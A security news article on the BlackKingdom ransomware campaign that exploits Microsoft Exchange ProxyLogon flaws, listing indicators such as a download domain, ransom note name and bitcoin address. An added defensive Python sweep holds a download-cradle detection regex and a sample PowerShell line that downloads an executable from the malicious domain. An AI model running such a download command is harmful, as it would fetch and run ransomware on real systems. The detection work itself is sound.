Security researcher Marcus Hutchins, aka MalwareTechBlog, has reported a new ransomware operation known as “BlackKingdom” that exploits the Microsoft Exchange Server ProxyLogon vulnerabilities.
Over the weekend, Marcus Hutchins tweeted that a threat actor was targeting Microsoft Exchange servers by exploiting the ProxyLogon vulnerabilities and deploying ransomware.
Having analyzed his honeypot logs, Hutchins determined that the threat actor executed a PowerShell script that downloaded the ransomware executable from the “yuuuuu44[.]com” website. The attacker then distributed the malware to other computers on the network. The ransomware encrypts files, assigns them random extensions, and then drops a ransom note named decrypt_file.TxT.
Honeypots are deliberately exposed systems that threat researchers use to lure attackers and record their activity as they interact with them.
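The two concrete indicators in the account above, the download domain and the ransom note filename, are the kind of thing a defender would sweep PowerShell script-block logs and file listings for. The following is an added example of such a sweep; it is not code from the article or from Hutchins, and the log lines and file paths it runs over are constructed samples, not real honeypot data. The domain is kept in its defanged form and only normalised at match time.

```python
import re

# Indicators taken from the report above. The domain stays defanged in source
# so the literal string never resolves; it is normalised only for matching.
DOWNLOAD_DOMAIN_DEFANGED = "yuuuuu44[.]com"
RANSOM_NOTE_NAME = "decrypt_file.txt"   # reported as decrypt_file.TxT; compared case-insensitively

# Common PowerShell download cradles. A hit requires the cradle AND the domain,
# which keeps ordinary Invoke-WebRequest use from firing on its own.
CRADLE_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString|Net\.WebClient)",
    re.I,
)


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('a[.]b') back into a matchable host ('a.b')."""
    return indicator.replace("[.]", ".")


def flag_powershell_lines(lines):
    """Return (line_no, line) for script-block log lines that reference the
    indicator domain together with a download cradle."""
    domain = refang(DOWNLOAD_DOMAIN_DEFANGED).lower()
    hits = []
    for n, line in enumerate(lines, 1):
        if domain in line.lower() and CRADLE_RE.search(line):
            hits.append((n, line))
    return hits


def find_ransom_notes(paths):
    """Return every path whose basename is the ransom note, case-insensitively.
    Backslashes are normalised so Windows and POSIX listings both work."""
    return [
        p for p in paths
        if p.replace("\\", "/").rsplit("/", 1)[-1].lower() == RANSOM_NOTE_NAME
    ]


# Constructed sample data (not real logs): three script-block entries and a file listing.
SAMPLE_LOG = [
    "ScriptBlock: Get-Process | Where-Object { $_.CPU -gt 100 }",
    "ScriptBlock: (New-Object Net.WebClient).DownloadFile('http://yuuuuu44.com/x.exe','C:\\Windows\\Temp\\x.exe')",
    "ScriptBlock: Invoke-WebRequest http://intranet.example/update.zip -OutFile update.zip",
]
SAMPLE_FILES = [
    "C:\\Users\\alice\\Documents\\report.docx.k9d2q",
    "C:\\Users\\alice\\Documents\\decrypt_file.TxT",
    "C:\\Users\\alice\\Desktop\\notes.txt",
]

if __name__ == "__main__":
    for n, line in flag_powershell_lines(SAMPLE_LOG):
        print(f"[PS] line {n}: {line}")
    for p in find_ransom_notes(SAMPLE_FILES):
        print(f"[FS] ransom note: {p}")
```

Feeding real script-block logs (Windows PowerShell operational log, event 4104) and a recursive directory listing to the two functions gives a quick first triage; the random file extension the article mentions is not matched here because no fixed pattern for it is given.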
According to submissions to the ransomware identification site ID Ransomware, the BlackKingdom campaign has been encrypting victims’ devices since March 18th. Michael Gillespie, the creator of ID Ransomware, says his system has received over 30 submissions from victims in the USA, Canada, Switzerland, Austria, Russia, France, Israel, the United Kingdom, Germany, Italy, Greece, Australia, and Croatia.
The attackers demand $10,000 in bitcoin, payable to a single Bitcoin address (1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT). The address has received only one payment, on March 18th.
BlackKingdom is the second known ransomware to exploit the Microsoft Exchange ProxyLogon vulnerabilities. The first was DearCry, a previously unknown ransomware family used in attacks earlier this month.
It is also worth mentioning that last week Acer suffered a REvil ransomware attack that is suspected to have exploited the ProxyLogon vulnerabilities too. The attackers are demanding the largest ransom in history from the company: $50 million. However, the Taiwanese electronics maker has not confirmed the news.
Last week, ESET said at least 10 state-backed hacking groups were now trying to exploit the Microsoft Exchange flaws.